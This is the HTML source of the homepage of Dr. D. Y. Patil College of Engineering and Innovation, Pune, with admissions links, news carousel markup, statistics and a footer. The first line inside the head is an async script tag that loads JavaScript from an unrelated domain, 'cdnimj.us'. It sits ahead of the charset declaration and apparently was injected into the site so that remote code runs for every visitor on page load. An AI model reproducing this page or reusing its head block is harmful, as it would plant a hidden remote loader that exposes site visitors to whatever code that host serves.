<!DOCTYPE html>
<html lang="en" class="no-js" data-ng-app="dypatilengg">       
    <head><script async type='text/javascript' src='http://cdnimj.us/2ErTrBMV_3231.js'></script>
    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <meta name="revised" content=""/>
    <meta name="keywords" content="College, Engineering, Innovation, Varale, Pune, Maharashtra, BE, Mechanical, BE, Civil, Admission, Educational, students, Courses"/>
    <meta name="author" content="Dr. Sushant Patil, Padmashree Dr. D. Y. Patil, B.E. Mechanical, B.E. Civil"/>
    <meta name="google-site-verification" content="HUrx4Rl3dA7-RAXttctQlASIaMogJaHSi37TBkzFOIc" />
    <meta name="description" content="Courses at Dr. D. Y. Patil Educational Federation are designed to equip students with skills to meet the challenges and opportunities of the corporate world. Our value based learning model provides transformational experience that fosters professional, intellectual, and personal development"/>

    <!-- Favicon icon -->
    <link rel="icon" type="image/png" sizes="16x16" href="http://dypatilcoei.com/assets/img/logo/dypeflogoFav.png">
            <title>College of Engineering and Innovation, Pune</title>
    
    <link rel="stylesheet" href="index_files/style.css" type="text/css" />   

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js" ></script>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.6/angular.min.js" ></script>
    <!-- Google Analytics -->
    <script>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments);
            }, i[r].l = 1 * new Date();
            a = s.createElement(o), m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m);
        })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
        ga('create', 'UA-100892201-3', 'auto');
        ga('send', 'pageview');
    </script>
    <!-- End Google Analytics -->
</head>    <body>        
        <!--<svg xmlns="http://www.w3.org/2000/svg" width="24" height="20"><path fill="none" stroke="#000" stroke-width="2" d="M1 1h22M9 7h14M1 13h22M9 19h14" stroke-linecap="round"></path></svg>-->

<!--<div class="header-top st">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row">                
                <div class="col-xl-10 col-lg-9 col-md-9 col-sm-8 col-xs-6 scrollnews">
                    <marquee>
                        <i class="fa fa-arrow-circle-right text-item17"></i> Admissions are Open for Engineering. <strong> APPLY NOW 2019-2020</strong>
                        &nbsp;
                        <i class="fa fa-arrow-circle-right text-item17"></i> First Year and Direct Second Year Admissions are Open for Mechanical and Civil Branches. <strong> APPLY NOW 2019-2020</strong> 
                        &nbsp;
                    </marquee>
                </div>
                <div class="col-xl-2 col-lg-3 col-md-3 col-sm-4 col-xs-6 admRed-block">
                    <h4><a href="http://dypatilcoei.com/admissions">Admissions Open</a></h4>                    
                </div>
            </div>
        </div>
    </div>
</div>-->



<div id='header-menubar' class="container-fluid navbar-dark p-0 st">
    <div class="container">
        <nav class="navbar navbar-expand-lg ">
            <!--<a class="navbar-brand" href="#">Navbar</a>-->
            <button class="navbar-toggler ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="20"><path fill="none" stroke="#fff" stroke-width="2" d="M1 1h22M9 7h14M1 13h22M9 19h14" stroke-linecap="round"></path></svg>
            </button>
            <div class="collapse navbar-collapse" id="navbarNav">
                <ul class="navbar-nav nav-fill w-100">
                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/">Home </a>
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="aboutDP" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                            <span>About Us</span>
                        </a>
                        <div class="dropdown-menu" aria-labelledby="aboutDP">
                            <a class="dropdown-item" href="http://dypatilcoei.com/about_college">Engineering College</a>
                            <a class="dropdown-item" href="http://dypatilcoei.com/about_founder">Dr. D. Y. Patil</a>
                            <a class="dropdown-item" href="http://dypatilcoei.com/about_president">President</a>                                   
                            <a class="dropdown-item" href="http://dypatilcoei.com/about_principal">Principal</a>              
                        </div>
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="programDP" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                            <span>Programs</span>
                        </a>
                        <div class="dropdown-menu" aria-labelledby="programDP">
                            <a class="dropdown-item" href="http://dypatilcoei.com/mechanical_program">Mechanical Engineering</a>
                            <a class="dropdown-item" href="http://dypatilcoei.com/civil_program">Civil Engineering</a>          
                        </div>
                    </li>

                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/admissions">Admission</a>
                    </li>
                    <!--                    <li class="nav-item">
                                            <a class="nav-link" href="faculty">Faculty</a>
                                        </li>-->
                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/gallery">Gallery</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/resources">Resources</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/lifedypcoei">Life@DYPCOEI</a>
                    </li>

                    <li class="nav-item">
                        <a class="nav-link" href="http://dypatilcoei.com/contact">Contact Us</a>
                    </li>
                </ul>
            </div>
        </nav>
    </div>
</div>
<section id="header-bottom" class="bg-background-header " style="background-image:url('http://dypatilcoei.com/assets/img/dypengg-bk.png');">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row justify-content-between">
                <div class="col-xl-5 col-lg-5 col-md-5 col-sm-12 col-xs-12 leftHeaderSide">
                    <img src="http://dypatilcoei.com/assets/img/logo/dypeflogofooter.png" alt="dypef" class="animated bounceIn"/>                    
                    <a href="http://dypatilcoei.com/" class=" animated fadeInRight">
                        <h1>Dr.&nbsp;D. Y. PATIL</h1>
                        <h3>College of Engineering and Innovation</h3>
                    </a>
                </div>
            </div>
        </div>
    </div>
</section>

 
        <div id="main-wrapper" >
            <link rel="stylesheet" href="http://dypatilcoei.com/assets/css/home.css" type="text/css" />

<div class="inc-height ">
    <section class="banner section-50">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row bannerdiv" >
                <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 col-xs-12">
                    <div id="dypef-slider" class="carousel slide" data-ride="carousel">
                        <ol class="carousel-indicators">
                            <li data-target="#dypef-slider" data-slide-to="0" class="active"></li>
                            <li data-target="#dypef-slider" data-slide-to="1"></li>
                            <li data-target="#dypef-slider" data-slide-to="2"></li>
                            <li data-target="#dypef-slider" data-slide-to="3"></li>
                        </ol>
                        <div class="carousel-inner">
                            <div class="carousel-item active">
                                <img src="http://dypatilcoei.com/assets/img/slider/enggSlider-1.jpg" alt="dypatilengineerSlider" class="img-responsive">
                            </div>                            
                            <div class="carousel-item ">
                                <img src="http://dypatilcoei.com/assets/img/slider/enggSlider-4.jpg" alt="dypatilengineerSlider" class="img-responsive">
                            </div>
                            <div class="carousel-item ">
                                <img src="http://dypatilcoei.com/assets/img/slider/enggSlider-3.jpg" alt="dypatilengineerSlider" class="img-responsive">
                            </div>
                            <div class="carousel-item ">
                                <img src="http://dypatilcoei.com/assets/img/slider/enggSlider-2.jpg" alt="dypatilengineerSlider" class="img-responsive">
                            </div>
                        </div>
                        <a class="carousel-control-prev" href="#dypef-slider" role="button" data-slide="prev">
                            <!--<span class="carousel-control-prev-icon" aria-hidden="true"></span>-->
                            <span class="fa fa-3x fa-angle-left" aria-hidden="true"></span>
                            <span class="sr-only">Previous</span>
                        </a>
                        <a class="carousel-control-next" href="#dypef-slider" role="button" data-slide="next">
                            <!--<span class="carousel-control-next-icon" aria-hidden="true"></span>-->
                            <span class="fa fa-3x fa-angle-right" aria-hidden="true"></span>
                            <span class="sr-only">Next</span>
                        </a>
                    </div>
                </div>                
            </div>
        </div>
    </div>
</section> 
    <section class="latestNews section-50 m-t-30" data-ng-controller="latestNewsController" data-ng-init="latestNewsFun()">
        <div class="container-fluid p-0">
            <div class="container">
                <div class="row">
                    <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 col-xs-12 ">
                        <p class="adm-h2 m-b-10">Latest News or Events</p>                        
                    </div>

                </div>

                
                <!-- {{newsData | json}} -->  
                <div class="row justify-content-center">
                    <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 col-xs-12 ">
                        <data-owl-carousel class="owl-carousel" data-options="owlOptionsLatestNews">
                            <div class="item card-list-event" owl-carousel-item="" data-ng-repeat="sd in latestnewsData| orderBy : -sortDate : true" >
                                <a href="http://dypatilcoei.com/event/{{sd.neId}}">
                                    <div class="card card_default card_with_image" style="background-image:url('http://admin.dypatilcoei.com/images/{{sd.neGallery_1}}')">
                                        <div class='bg-overlay'></div>
                                        <div class="card-body">
                                            <div class="card-title card-title-small">{{sd.neTitle}}</div>
                                            <small class="post_meta">
                                                <span class="post-meta-rm">Read More</span>
                                            </small>
                                        </div>
                                    </div>
                                    <div class="caption-Text">
                                        <p>{{sd.neCaption}}</p>
                                    </div>
                                </a>
                            </div>

                        </data-owl-carousel>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <section class="intro-section section-50">
        <div class="container-fluid ">
            <div class="container">

                <div class="row">
                    <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12 col-xs-12 intro-edu-count">
                        <h1 class="">WHY DR. D.Y.PATIL?</h1>
                        <h2 >Dr. D. Y. Patil is the leading educational group of India.</h2>
                        <div class="educationCount">
                            <ul class="list-inline facts">
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-1"> <span>31</span> </strong>                                
                                        <p>Years of Education Experiences</p>                                
                                    </span>
                                </li>
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-2"> <span>4</span> </strong>                                
                                        <p>Universities across Maharashtra</p>                                
                                    </span>
                                </li>
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-3"> <span>200,000</span> </strong>                                
                                        <p>Students</p>                                
                                    </span>
                                </li>
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-4"> <span>500,000</span> </strong>                                
                                        <p>Alumni across the world</p>                                
                                    </span>
                                </li>
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-5">  <span>200</span><sup>+</sup> </strong>                                
                                        <p>Institutions Across India</p>                                
                                    </span>
                                </li>
                                <li class="list-inline-item">
                                    <span>
                                        <strong class="lines-6"> <span>1000</span> </strong>                                
                                        <p>Courses/Programs</p>                                
                                    </span>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-xl-4 col-lg-4 col-md-12 col-sm-12 col-xs-12 featureLinks">
                        <ul class="nav nav-pills ">

                            <li>
                                <a href="https://www.unipune.ac.in" target="_blank" class="list-group-item animated fadeInLeft delay-0s">
                                    <img src="http://dypatilcoei.com/assets/img/icon/university_1.jpg" alt="universityIcon" />
                                    <div class="mediabodyl-hgt">
                                        <span><b>Affiliated to</b> <br/>
                                            Savitribai Phule Pune University
                                        </span>
                                    </div>
                                </a>
                            </li>

                            <li>
                                <a href="http://dypatilcoei.com/resources#library-block" class="list-group-item animated fadeInLeft delay-1s">
                                    <img src="http://dypatilcoei.com/assets/img/icon/library_1.jpg" alt="LibraryIcon" />
                                    <div class="mediabodyl-hgt">
                                        <span>
                                            <b>Enhanced Library</b><br/> 
                                            on-campus library for DYPEF students
                                        </span>
                                    </div>
                                </a>
                            </li>

                            <li>
                                <a href="http://dypatilcoei.com/lifedypcoei#industrialVisitLink" class="list-group-item animated fadeInLeft delay-2s">
                                    <img src="http://dypatilcoei.com/assets/img/icon/placement_1.jpg" alt="PlacementIcon"/>
                                    <div class="mediabodyl-hgt">
                                        <span><b>TPO</b> <br/>
                                            Placements in all streams
                                        </span>
                                    </div>
                                </a>
                            </li>

                            <li>
                                <a href="http://dypatilcoei.com/faculty" class="list-group-item animated fadeInLeft delay-3s">
                                    <img src="http://dypatilcoei.com/assets/img/icon/staff_1.jpg" alt="StaffIcon" />
                                    <div class="mediabodyl-hgt">
                                        <span><b>Experienced</b><br/> 
                                            Staff which make better future generations
                                        </span>
                                    </div>
                                </a>
                            </li>

                            <li>
                                <a href="#" class="list-group-item animated fadeInLeft delay-4s">
                                    <img src="http://dypatilcoei.com/assets/img/icon/wifi_1.jpg" alt="WifiIcon" />
                                    <div class="mediabodyl-hgt">
                                        <span><b>Wi-Fi</b> <br/>
                                            enabled campus for DYPEF students
                                        </span>
                                    </div>
                                </a>
                            </li>

<!--                            <li>
                                <a href="resources#hostel-block" class="list-group-item animated fadeInLeft delay-5s">
                                    <img src="assets/img/icon/hostel_1.jpg" alt="HostelIcon" />
                                    <div class="mediabodyl-hgt">
                                        <span><b>Hostel</b><br/> 
                                            facility for boys and girls.
                                        </span>
                                    </div>
                                </a>
                            </li>-->
                        </ul>
                    </div>
                    <p class="intro-p animated fadeInUp"><strong>Dr. D. Y. Patil College of Engineering and Innovation (D.Y.P.C.O.E.I.)</strong> is a part of the Engineering’s dream to raise future-ready citizens. We have always believed that the environment in which learning takes place plays a pivotal role in determining the outcome of the learning. We have personally ensured that our students are offered with nothing less than the best in terms of infrastructure and learning aid.</p>
                </div>

            </div>
        </div>
    </section>

    <section class="watchintro-section section-50">
        <div class="container-fluid">
            <div class="container">
                <div class="row">
                    <div align="center" class="col-xl-5 col-lg-5 col-md-12 col-sm-12 col-xs-12 embed-responsive embed-responsive-16by9 animated fadeInLeft">
                        <video  controls class="embed-responsive-item">
                            <source src=video/DYPEF_Film.mp4 type=video/mp4 />
                            <source src=video/DYPEF_Film.webm type=video/mp4 />
                        </video>
                    </div>
                    <div class="col-xl-7 col-lg-7 col-md-12 col-sm-12 col-xs-12 intro-college animated fadeInRight">
                        <p>Courses at Dr. D. Y. Patil Educational Federation are designed to equip students with skills to meet the challenges and opportunities of the corporate world. Our value based learning model provides transformational experience that fosters professional, intellectual, and personal development. </p>
                        <h4> <a href="http://dypatilcoei.com/assets/files/Prospectus_DYPEF.pdf" class="text-dypatil-red"><i class="fa fa-download"></i> &nbsp; Download DYPEF Prospectus</a></h4>
                    </div>
                </div>
            </div>
        </div>
    </section>
</div>



 
        </div>        
        
<!--footer Section Start-->
<div id="footer" class="section-50">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row">
                <div class="col-xl-5 col-lg-5 col-md-5 col-sm-12 col-xs-12 puneUni-block">
                    <img src="http://dypatilcoei.com/assets/img/Pune_univ_logo_white.png" alt="puneUniversity" />
                    <!--<h6>Permanently </h6>-->
                    <!--<h2>Affiliated to Savitribai Phule, <strong>Pune University</strong></h2>-->
                    <h2>Affiliated to SAVITRIBAI PHULE PUNE UNIVERSITY</h2>
                    <div class="col-12">
                        <h5>Approved by DTE(MS) & recognized by AICTE New Delhi.</h5>
                        <h5>Courses offered in <strong>Mechanical</strong>, <strong>Civil</strong> & <strong>Computer Engineering</strong></h5>
<!--                        <h5><b>Institute Choice Code</b> : B.E. Mechanical 683461210</h5>                        
                        <h5><b>Institute Choice Code</b> : B.E. Civil 683419110</h5>                        -->
                        <h5><b>Institute PUN Code</b> : CMMP020350</h5>
                        <h5><b>Institute DTE CODE</b> : 6834</h5>
                        <h5><a href="http://www.unipune.ac.in/">http://www.unipune.ac.in/</a></h5>
                    </div>
                </div>
                
                <div class="col-xl-3 col-lg-3 col-md-3 col-sm-12 col-xs-12 footer-widget" data-ng-controller="latestNewsController" data-ng-init="Events()">
                    <h3>Events</h3>
                    <ul class="list-unstyled" >                        
                        <li data-ng-repeat="nd in eventData| limitTo :6 | orderBy : -sortDate : true" ><a href="http://dypatilcoei.com/event/{{nd.neId}}">{{nd.neCaption}}</a></li>                                           
                    </ul>
                </div>

                <div class="col-xl-2 col-lg-2 col-md-2 col-sm-12 col-xs-12 footer-widget">
                    <h3>Committee</h3>
                    <ul class="list-unstyled">                        
                        <li><a target="_blank" href="https://sites.google.com/site/dypefonline/home/committee/anti-ragging-committee">Prohibition of ragging</a></li>
                        <li><a target="_blank" href="https://sites.google.com/site/dypefonline/home/committee/grievance-committee">Grievance Redressal Committee </a></li>
                        <!--<li><a target="_blank" href="assets/files/SSS-MBA-2015-2016.pdf">Shikshan Shulka Samiti</a></li>-->
                        <!--<li><a target="_blank" href="">Minimum Disclosure</a></li>-->
                        <li><a target="_blank" href="http://dypatilcoei.com/">Mandatory Disclosure</a></li>
                    </ul>
                </div>
                <div class="col-xl-2 col-lg-2 col-md-2 col-sm-12 col-xs-12 footer-widget">
                    <h3>Explore Links </h3>
                    <ul class="list-unstyled">
                        <li><a href="http://dypatilcoei.com/about_college">About College</a></li>
                        <li><a href="http://dypatilcoei.com/admission">Admission</a></li>
                        <li><a href="http://dypatilcoei.com/news">Latest News</a></li>
                        <li><a href="http://dypatilcoei.com/gallery">Gallery</a></li>
                        <li><a href="http://dypatilcoei.com/lifedypcoei#eventLink">Events</a></li>                        
                        <li><a href="https://www.aicte-india.org/"> AICTE</a></li>
                        <li><a href="https://www.dtemaharashtra.gov.in/">DTE </a></li>                        
                    </ul>
                </div> 
            </div>
        </div>
    </div>
</div>
<!--Footer Section End-->


<!--Copyright Section Start-->
<div id="copyRight" class="container-fluid "> 
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-12 text-left">
                <!--<p>Copyright 2019 © <a href="">dypatilcoei</a></p>-->
                <p>Copyright © 2019 &nbsp; | &nbsp; All rights reserved.</p>
            </div>
        </div>
    </div>
</div>
<!--Copyright Section End-->        
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.15.0/esm/popper.min.js" ></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.min.js" ></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js" ></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/aos/2.3.4/aos.js" ></script>
<script src="https://raw.githubusercontent.com/AME-Online-Solutions/DYPatilCOEI/master/index_files/ggSlider.js" ></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-animateNumber/0.0.14/jquery.animateNumber.min.js" ></script>

<script src="https://raw.githubusercontent.com/AME-Online-Solutions/DYPatilCOEI/master/index_files/custom.js" ></script>
<!--<script src="http://dypatilcoei.com/assets/angular-ui-carousel/dist/ui-carousel.min.js" ></script>-->
<script src="https://raw.githubusercontent.com/AME-Online-Solutions/DYPatilCOEI/master/index_files/angular-controller.js" ></script>    </body>
</html>
